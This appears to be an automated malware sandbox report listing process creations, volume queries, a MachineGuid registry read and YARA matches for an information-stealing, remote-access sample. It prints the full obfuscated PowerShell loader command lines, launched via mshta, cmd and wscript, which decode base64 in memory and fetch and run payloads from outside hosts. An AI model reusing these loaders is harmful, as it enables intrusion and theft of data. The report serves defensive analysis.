Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality